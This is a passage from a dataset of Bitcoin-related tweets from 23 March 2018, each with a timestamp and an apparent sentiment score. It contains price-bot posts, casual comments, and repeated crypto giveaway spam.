$8382.00 via Chain,0.0 +Fri Mar 23 06:04:24 +0000 2018,Current price of #Bitcoin is $8382.00 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 06:04:27 +0000 2018,@yahaya_aminu Ditcoin is best cryptocurrency ditcoin my life Bitcoin my dream,1.0 +Fri Mar 23 06:04:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:05:40 +0000 2018,BITCOIN IS AT 8445.2475,0.0 +Fri Mar 23 06:06:21 +0000 2018,"#surprise #presents #crypto #bitcoin #ethereum #litecoin #tron #blockchain #party #game #cryptonews + +its awesome technology",1.0 +Fri Mar 23 06:06:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:06:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:06:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:07:10 +0000 2018,"MEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:07:30 +0000 2018,Bitcoin is the new gold ! Retweet if you agree #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews #bitcoin,1.0 +Fri Mar 23 06:07:36 +0000 2018,@bxbynatyy_ Bitcoin by @RiceGum 🔥,0.0 +Fri Mar 23 06:07:50 +0000 2018,$NEOUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 06:07:50 +0000 2018,"guys, Bitcoin is SO cool 😎",1.0 +Fri Mar 23 06:08:09 +0000 2018,"Fri Mar 23 07:07:28 2018 (42:07) +USD : 8456.67 +Wght: 0.42 +Blk#: 514766 +Size: 1061.3 KB +TXs: 2194 +Pool: 2301 (1.5 MB) +#bitcoin",0.0 +Fri Mar 23 06:08:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:08:49 +0000 2018,New #bitcoin block 000000000000000000302f93f324f3ff181ef7b90b0fa362e598a4282359d8b9 mined at height 514766.,1.0 +Fri Mar 23 06:09:08 +0000 2018,BTC $8437.14 Down -$23.19 -0.27% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 06:09:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:22 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:28 +0000 2018,@mrupsys @alistairmilne So now bitcoin is an indication of intellectual ability?,1.0 +Fri Mar 23 06:09:32 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:09:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.460,410 +1 Hour: 0.16 % | 24 Hours: -6.42 % | 7 Days: 3.24 % +#btc #bitcoin",0.0 +Fri Mar 23 06:10:03 +0000 2018,"1 bitcoin = $8476.41 / 6872.088€ +1 bitcoin-cash = $974.314 / 789.906€ +1 ethereum = $523.501 / 424.419€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:10:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:11:01 +0000 2018,@Bitcoin Worrying! Looks like the way they do their routing currently is flawed. I hope they fix this.,-1.0 +Fri Mar 23 06:11:14 +0000 2018,"5c7cf1999d445141efe2e6fa5744b6b7c8d4cb6a822a9c767aa7bf4be03edad6/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:14 +0000 2018,"432835a27ab9454aa84965fa94656a7b8dc93a485326f11a809363992cabac5b/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:16 +0000 2018,"0387e434ab2d22b18484c814ce53ff04f6c612bddc82e01e4da31c2727dd41a3/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:18 +0000 2018,"eadf150ea606e1eafacb4818112bd04dc338d9b5cb7980729e6297a3be87c06f/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:20 +0000 2018,"54c46c61ca70a4928d435d791a0085dd119b49ba229ae37e667c71ab93ccd71c/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:22 +0000 2018,"74caa12b03207a43e3d9c52cfd736e72a01ffcaee2f8b6991bda1473a2748ff8/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:24 +0000 2018,"d8e78ddd912abc05ba635fba92e5349a23f6dbf6c6a457e6d7a6503a47b95119/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 06:11:28 +0000 2018,Bitcoin value: $8456.44,0.0 +Fri Mar 23 06:11:41 +0000 2018,Bitcoin Drops Over 4% After Japan Warns World's Largest Cryptocurrency Exchange.,0.0 +Fri Mar 23 06:12:25 +0000 2018,Everyone worried about the impending US-China Trade War? Invest in Cryptocurrancies #bitcoin #ethereum,0.0 +Fri Mar 23 06:12:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:12:34 +0000 2018,"Bitcoin just moves this fast now, it aint fast, young, and fun anymore. Kinda like me.",1.0 +Fri Mar 23 06:12:59 +0000 2018,@ProfFaustus Jesus this was like reading a tabloid article. So you are advertising to be doing what Bitcoin already does? Great.,1.0 +Fri Mar 23 06:13:00 +0000 2018,i take great care about bitcoin can i just buy some ethereum on minecraft,1.0 +Fri Mar 23 06:13:41 +0000 2018,"Here’s a very good video on bitcoin guys, just watch it!",1.0 +Fri Mar 23 06:14:07 +0000 2018,"another dip for #bitcoin from $9k to $8k, a good time to buy.😀 #BTC #trading #bitconprice #price #Crypto #cryptocurrency",1.0 +Fri Mar 23 06:14:24 +0000 2018,"this guy brought up bitcoin on a first date but i'm considering a second b/c he had nice hair...i really do hate myself, huh",1.0 +Fri Mar 23 06:14:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:14:33 +0000 2018,"More +#Ice #Pay #Airdrop #Bounty #Transaction #Performance #Bitcoin #Ethereum #MEW",1.0 +Fri Mar 23 06:14:46 +0000 2018,"Current Bitcoin Price = $9448.00 --- Includes Sum of Forks, Core $8422.00 (89.14%) + Cash $968.87 (10.25%) + Gold $57.13 (0.60%)",0.0 +Fri Mar 23 06:14:48 +0000 2018,"@magicalmoney_ Enter draw to win ten million MIM$ #bitcoin #crypto +@IGlowInThe_Dark +@shamsudean1 + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:15:03 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 06:15:06 +0000 2018,"TUBI will be listed at coinmarketcap very soon! +#Altcoins #bitcoin #TokenFest #tokenSale #ethereum #Cryptos #cryptotrading",1.0 +Fri Mar 23 06:15:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:16:06 +0000 2018,"@magicalmoney_ @CHUDDI_KAY @youb +Enter draw to win ten million MIM$ #bitcoin #crypto + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:16:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:16:41 +0000 2018,"@magicalmoney_ @UMARUBERNARD @crypto_xpress +Enter draw to win ten million MIM$ #bitcoin #crypto + +3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm",1.0 +Fri Mar 23 06:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$974,314 +1 Hour: 0.27 % | 24 Hours: -7.08 % | 7 Days: 5.90 % +#bch #bitcoin cash",0.0 +Fri Mar 23 06:17:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:27 +0000 2018,"@PatWielandLIVE @DigiByteCoin #DigiByte baby, yeahhhhh buddy!! + +#DigiHash #DigibyteOneClickMiner #InternationalDayOfHappiness #bitcoin",0.0 +Fri Mar 23 06:17:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:17:50 +0000 2018,@CodeSCrypto @coindesk Like... why has Bitcoin not climbed to $1.0Mil yet from this? Lol,1.0 +Fri Mar 23 06:18:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8419.34 #bitcoin,0.0 +Fri Mar 23 06:18:01 +0000 2018,POWR is now £0.24. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 06:18:05 +0000 2018,"inb4: ""Black Friday"" $btc $DJI #crypto #bitcoin #tradewars #donaldpump",-1.0 +Fri Mar 23 06:18:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:18:49 +0000 2018,@zebpay Tcc one and only one best second Bitcoin cryptocrency,1.0 +Fri Mar 23 06:20:04 +0000 2018,"1 bitcoin = $8480.91 / 6875.736€ +1 bitcoin-cash = $974.49 / 790.049€ +1 ethereum = $524.644 / 425.345€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:20:22 +0000 2018,@Cylinders_io Interesting project good future for him! #CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale,1.0 +Fri Mar 23 06:21:07 +0000 2018,@MarkYusko @FoxBusiness @MorningsMaria @MariaBartiromo is there an over under on how many times you use the word ‘bitcoin’ on the show?,1.0 +Fri Mar 23 06:21:27 +0000 2018,@chuckwoolery All the more reason to give gun owners and gun dealers reason to use Bitcoin!!,1.0 +Fri Mar 23 06:21:51 +0000 2018,@ValoremF this is something we need in the future. #AdVelorem #Bitcoin #Valorem #Ico #VLR,0.0 +Fri Mar 23 06:21:52 +0000 2018,"@missbitcoin_mai I wish Bitcoin was spelled ""Bit-o-coin"", sounds cool",1.0 +Fri Mar 23 06:22:06 +0000 2018,"@superwuster Bitcoin. +Have never used Amazon in Australia.",0.0 +Fri Mar 23 06:22:07 +0000 2018,"Yea I refer to cash as prehistoric money. Deal with it. + +#cryptocurrency #Bitcoin #blockchain #PIVX",0.0 +Fri Mar 23 06:22:09 +0000 2018,@nytimes @Bitcoin All the more reason for gun owners and gun dealers start using bitcoin!!,1.0 +Fri Mar 23 06:22:17 +0000 2018,Excellent projects always deserve a lot of attention. #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale,1.0 +Fri Mar 23 06:22:51 +0000 2018,"@esocktheman 2-time best man, ordained wedding officiant and international battle rapper. hmu for rates, Bitcoin only.",1.0 +Fri Mar 23 06:23:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:23:39 +0000 2018,@BKachel Are you the bitcoin spammer!?,0.0 +Fri Mar 23 06:24:40 +0000 2018,"@rogerkver @Falkvinge and thousands of people who went in 2011 all in, don’t care about bitcoin cash🤔",0.0 +Fri Mar 23 06:24:45 +0000 2018,"@officialmcafee John, do you know if bitcoin is a creature of CIA?",0.0 +Fri Mar 23 06:24:51 +0000 2018,Add the two letters„ch“ somwhere to #bitcoin. Yeah right... that‘s some swiss bank conpiracy theory shit. Don‘t buy this crap!,-1.0 +Fri Mar 23 06:25:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:26:14 +0000 2018,Fuck a bitcoin,-1.0 +Fri Mar 23 06:26:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:26:22 +0000 2018,Interested in learning more about blockchain and cryptocurrency like Bitcoin? Come join me and IBM at the IBM Coder Program! #IBMCoder,1.0 +Fri Mar 23 06:26:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:27:05 +0000 2018,@JeremyRubin @prestonjbyrne How bout you create a Bitcoin fork for people that want to call Satoshi she? 😂,0.0 +Fri Mar 23 06:27:39 +0000 2018,@aliraja How can you 'predict' when bitcoin goes down?,-1.0 +Fri Mar 23 06:28:40 +0000 2018,Mainly focuses on #bitcoin and #ethereum,1.0 +Fri Mar 23 06:28:41 +0000 2018,"@BeenSuave_23 def time machine.. i can buy bitcoin before the blow up, and see my lost ones..",0.0 +Fri Mar 23 06:29:04 +0000 2018,@DavidHayCrypto But the real question is: How much Bitcoin is it worth?,1.0 +Fri Mar 23 06:30:02 +0000 2018,"Bitcoin:$8452.41 +Ethereum:$522.493 +Bitcoin Cash:$971.799 +Litecoin:$158.521 +Ripple:$0.636124 +IOTA:$1.27449",0.0 +Fri Mar 23 06:30:03 +0000 2018,"1 bitcoin = $8452.41 / 6852.63€ +1 bitcoin-cash = $971.799 / 787.867€ +1 ethereum = $521.708 / 422.965€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:30:05 +0000 2018,One Bitcoin now worth $8417.00@bitstamp. High $9028.740. Low $8342.000. Market Cap $142.535 Billion #bitcoin,1.0 +Fri Mar 23 06:30:05 +0000 2018,"FACT: Bitcoin network speed in 2013 began at 25TH/s and reached 11000TH/s by years end, eclipsing all of the worlds supercomputers combined.",0.0 +Fri Mar 23 06:30:28 +0000 2018,#EOS Price is 0.00078052 (-0.00000195) #BTC / 6.56003 (-0.00725) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:29 +0000 2018,#ADA Price is 0.00002255 (-0.00000004) #BTC / 0.189556 (-0.00006) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#DASH Price is 0.0478863 (+0.00009710) #BTC / 402.467 (+1.37100) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#SUB Price is 0.00004536 (-0.00000022) #BTC / 0.381257 (-0.00129) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 06:30:30 +0000 2018,#XEM Price is 0.00003306 (+0.00000015) #BTC / 0.277827 (+0.00162) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 06:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8452.41 as of Fri Mar 23 01:31:09 CDT 2018",0.0 +Fri Mar 23 06:31:29 +0000 2018,Bitcoin value: $8423.62,0.0 +Fri Mar 23 06:32:22 +0000 2018,"The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #btc",1.0 +Fri Mar 23 06:32:26 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:33:17 +0000 2018,@BitcoinEdu And now we are close to 25 Exahash/s and it's turned out to be one of the big challenges with #Bitcoin.,0.0 +Fri Mar 23 06:33:26 +0000 2018,"It's already happening, an informed govt. will never stop it. @wef #bitcoin #blockchain #ethereum #cryptocurrency #altcoi",0.0 +Fri Mar 23 06:33:53 +0000 2018,I just won free 10 satoshi from PlayBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 06:35:03 +0000 2018,"‘Diet Bitcoin’: Brother of Drug Kingpin Pablo Escobar Launches Bizarre ICO, Claims He Met Satoshi #blockchain $btc #trading",1.0 +Fri Mar 23 06:35:32 +0000 2018,@FaucetHubIO how can I make a new address for bitcoin?,1.0 +Fri Mar 23 06:35:35 +0000 2018,binance...bitcoin.......Bussy,0.0 +Fri Mar 23 06:35:39 +0000 2018,"BITCOIN futures: 8,400 (-200)",0.0 +Fri Mar 23 06:36:01 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:36:44 +0000 2018,@CaptainScio dude u are amazing. Whats ur latest thoughts on crypto and bitcoin etc... in relation to Gann theory,1.0 +Fri Mar 23 06:37:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:38:27 +0000 2018,"The year is 2020: + +The Bitcoin community has forked again due to irreconcilable differences about Satoshi's gender.",-1.0 +Fri Mar 23 06:38:34 +0000 2018,@AnselLindner @Bitcoin And they act like they're decentralized. Talk about virtue signaling.,0.0 +Fri Mar 23 06:38:39 +0000 2018,@FoxBusiness #2A banking system just gave every American reason to start using #bitcoin!! #cryptocurrency,0.0 +Fri Mar 23 06:39:01 +0000 2018,"Sea of Red for #cryptocurrency today. #Bitcoin, #Ethereum, #Ripple take the plunge. Hope you enjoy the profits",1.0 +Fri Mar 23 06:39:13 +0000 2018,Hey team...Just a reminder that the ICO price of $WAN was .34$....patience. #Bitcoin #eth #neo,-1.0 +Fri Mar 23 06:39:44 +0000 2018,@_Kevin_Pham Yeah but Bitcoin Trans is going to be FABULOUUUUUS!,0.0 +Fri Mar 23 06:39:46 +0000 2018,Goldman Sachs apparently requires 100% margin from most customers for clearing BITCOIN FUTURES.,1.0 +Fri Mar 23 06:40:02 +0000 2018,"1 bitcoin = $8449.82 / 6850.531€ +1 bitcoin-cash = $967.86 / 784.674€ +1 ethereum = $521.273 / 422.612€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:40:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:40:19 +0000 2018,@ICODrops Another killer eth and bitcoin :))))))))(,1.0 +Fri Mar 23 06:40:36 +0000 2018,@BloombergDotOrg @Mayors4Climate Talk Bitcoin only!!!,0.0 +Fri Mar 23 06:40:45 +0000 2018,Next stop 5k. $Bitcoin is a bubble of noobs.,0.0 +Fri Mar 23 06:41:21 +0000 2018,"฿ value over 3 months: --40.71%, ($-5768) [Currently $8402.005] #bitcoin",0.0 +Fri Mar 23 06:41:39 +0000 2018,@zebpay The Champcoin is next Bitcoin.Tcc is Frist cryptocurrency in India.I love Tcc,1.0 +Fri Mar 23 06:42:19 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8410 / €6820 / £5960 @ Block 514766. +Market Cap: 143.29B USD. #Bitcoin #Finance",0.0 +Fri Mar 23 06:43:17 +0000 2018,Current price of Bitcoin is $8382.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 06:43:25 +0000 2018,"$ICX listing on #bithumb is today and not the 25th. Hope there will be some good price action! • +• +#icon #btc #bitcoin #cryptocurrency",1.0 +Fri Mar 23 06:43:32 +0000 2018,@benchten Are “billioins” some new type of bitcoin?,1.0 +Fri Mar 23 06:44:00 +0000 2018,"really want to donate to sci-hub for its priceless service rendered to all broke students but why do u only accept bitcoin, sci-hub.",1.0 +Fri Mar 23 06:44:23 +0000 2018,"425 #Bitcoin mined since last tweet. + + It represents $3,587,425 (At $8,441 per $BTC #BTC) + New Supply: 16,934,575 + Progress: 80.64 %",1.0 +Fri Mar 23 06:45:06 +0000 2018,@infowars It’s time to fight the banks use bitcoin to buy your guns! #bitcoinnews #2A #cryptocurrencies,0.0 +Fri Mar 23 06:45:11 +0000 2018,Got left holding a bag while I was sleeping. #crypto #cryptocurrencies #btc #Bitcoin,0.0 +Fri Mar 23 06:46:01 +0000 2018,"BITCOIN futures: 8,390 (-210)",0.0 +Fri Mar 23 06:46:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:46:27 +0000 2018,@Cyrii_Lightning 100 percent....it's a pile of dogshit to hold while bitcoin is falling,0.0 +Fri Mar 23 06:46:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:08 +0000 2018,"Who else is ""Doubling Down"" on Bitcoin? +Peter Thiel +Rainer-Marc Frey +....",-1.0 +Fri Mar 23 06:47:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:43 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:47:53 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:48:05 +0000 2018,There is only one Bitcoin.,0.0 +Fri Mar 23 06:48:22 +0000 2018,@8bitandstuff We have to dump nobbs in $bitcoin,0.0 +Fri Mar 23 06:48:40 +0000 2018,"@JoelOsteen Heaven Helps Those who Help Themselves. Get Started with Bitcoin trade and Earn over $12,000 Weekly. Follow the Right Part.",1.0 +Fri Mar 23 06:48:44 +0000 2018,"@Cointelegraph This debate about what coins are, including Bitcoin, is really stupid.",-1.0 +Fri Mar 23 06:48:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:49:11 +0000 2018,@Egon_01 @Nicknameul @el33th4xor on the bitcoin network? 😦why not bitcoin cash? blocks too big?,0.0 +Fri Mar 23 06:50:01 +0000 2018,"BTC-SIB AskRate: 0.00014245 #Bittrex #SIB $SIB #Siberian Chervonets #altcoin #bitcoin #cryptocurrencies + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 06:50:03 +0000 2018,"1 bitcoin = $8429.78 / 6834.283€ +1 bitcoin-cash = $966.927 / 783.917€ +1 ethereum = $517.549 / 419.593€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:51:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:51:18 +0000 2018,@HoldenCrypfield Bitcoin isn't a company.,0.0 +Fri Mar 23 06:51:29 +0000 2018,Bitcoin value: $8396.97,0.0 +Fri Mar 23 06:52:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:52:30 +0000 2018,"@nakamotech fan: h +winwin: i accept credit debit bitcoin",0.0 +Fri Mar 23 06:52:35 +0000 2018,Bitcoin drops over 4% after Japan warns largest operator #Market,0.0 +Fri Mar 23 06:52:43 +0000 2018,@officialmcafee so when is your $1M bitcoin price call gona happen?,0.0 +Fri Mar 23 06:53:16 +0000 2018,@SiLoMixMaster @BigCheds Icon is gaining while Bitcoin is dropping arm 🤑🤑,0.0 +Fri Mar 23 06:53:56 +0000 2018,"aEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:54:10 +0000 2018,Blocked by @wmiddelkoop because of #Bitcoin and #Crypto -- Bullish!,0.0 +Fri Mar 23 06:54:11 +0000 2018,@Altcoinbuzzio Litecoin bitcoin safest but plenty others quite safe,1.0 +Fri Mar 23 06:55:50 +0000 2018,@WhalePanda Whale is bitcoin and litecoin ⚡️atomic swap 🔜There wasn’t no update on the last show.,0.0 +Fri Mar 23 06:56:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:56:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:56:35 +0000 2018,"@Altcoinbuzzio Bitcoin, obvs..",0.0 +Fri Mar 23 06:58:29 +0000 2018,@contestpal How many RS. in a Bitcoin?,1.0 +Fri Mar 23 06:58:53 +0000 2018,Is Bitcoin Cash [BTG] dying a slow death @360_trader? #BTC #bitcoin #TA,-1.0 +Fri Mar 23 06:59:00 +0000 2018,"23% of Lost Bitcoin May Never Be Recovered~ TimeBox will fix the problem in future! + +#BTC #ETH #Timebox",0.0 +Fri Mar 23 06:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27791.66 | LITECOIN(MCDTBC) R$573.33000000,0.0 +Fri Mar 23 06:59:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:59:25 +0000 2018,Nigga had 40 bitcoin on a flash drive,0.0 +Fri Mar 23 06:59:32 +0000 2018,"@eco is a pretty awesome concept..if it succeeds, I see myself using it + +#eco #bitcoin #crypto #blockchain",1.0 +Fri Mar 23 07:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8383.1 USD = 1 BTC",-1.0 +Fri Mar 23 07:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,415.39, market cap of $142,511,053,109 (44.31%), and 24 hr vol. of $5,562,470,000 (37.71%)",0.0 +Fri Mar 23 07:00:01 +0000 2018,"Mar 23, 2018 12:00AM #Bitcoin Price: +USD 8634.59 | EUR 7012.58 | JPY 914988.62",0.0 +Fri Mar 23 07:00:01 +0000 2018,"Average Bitcoin market price is: USD 8,382.36, EUR 6,803.94",-1.0 +Fri Mar 23 07:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,422.22 +Change in 1h: -0.32% +Market cap: $142,626,716,256.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 07:00:03 +0000 2018,"Bitcoin:$8415.39 +Ethereum:$517.299 +Bitcoin Cash:$969.716 +Litecoin:$158.245 +Ripple:$0.634575 +IOTA:$1.26241",0.0 +Fri Mar 23 07:00:04 +0000 2018,"1 bitcoin = $8415.39 / 6822.617€ +1 bitcoin-cash = $967.81 / 784.633€ +1 ethereum = $517.35 / 419.431€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:00:04 +0000 2018,2018-03-23 07:00 UTC Bitcoin Price: 8383.70 USD,0.0 +Fri Mar 23 07:00:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:00:11 +0000 2018,"Buy? Sell? Or wait? Daily Forecasts for EURUSD, GBPUSD, USDJPY, Bitcoin, etc. on Daily, Weekly and Monthly charts. #ForexTips",0.0 +Fri Mar 23 07:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8375.55/$8383.69 #Bitstamp +$8368.09/$8373.98 #Kraken +⇢$-15.60/$-1.57 +$8321.19/$8404.84 #Coinbase +⇢$-62.50/$29.29",0.0 +Fri Mar 23 07:00:15 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$25.0M; Support til $8100:$50.4M $BTC $BTCUSD #bitcoin #orderbook #crypto #markets,1.0 +Fri Mar 23 07:00:22 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token,-1.0 +Fri Mar 23 07:00:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:00:26 +0000 2018,#XEM Price is 0.00003298 (-0.00000008) #BTC / 0.276503 (-0.00132) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:28 +0000 2018,#ADA Price is 0.00002259 (+0.00000004) #BTC / 0.189401 (-0.00015) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:29 +0000 2018,#DASH Price is 0.0474978 (-0.00038850) #BTC / 398.212 (-4.25500) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:29 +0000 2018,#SUB Price is 0.00004444 (-0.00000092) #BTC / 0.372594 (-0.00866) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:30 +0000 2018,#EOS Price is 0.00077674 (-0.00000378) #BTC / 6.51204 (-0.04799) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:30 +0000 2018,"BTC hourly update +$8394.84 | -0.0018%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 07:00:38 +0000 2018,#xatracoin is wonderful project. Don't miss it! #XTR #ICO #XATRA #Blockchain #Coin #BTC #bitcoin #ETH #Ethereum,1.0 +Fri Mar 23 07:00:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in 